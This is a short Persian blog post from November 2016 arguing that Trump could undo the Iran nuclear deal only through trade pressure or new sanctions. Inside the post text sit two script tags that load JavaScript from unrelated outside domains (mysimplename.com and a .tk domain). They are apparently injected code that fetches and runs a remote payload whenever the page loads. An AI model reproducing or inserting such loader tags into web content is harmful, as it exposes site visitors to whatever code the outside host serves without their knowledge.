راه های ترامپ برای بر هم زدن برجام !!


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>ترامپ تنها با مشکل سازی تجارت کشور ها با ایران و یا با وضع تحریم های جدید در ایران میتواند برجام را لغو کند.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0
ارسال در 1395/8/25 ساعت 12:02 2016-11-15 11:02:59
mohsen
توسط mohsen


عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر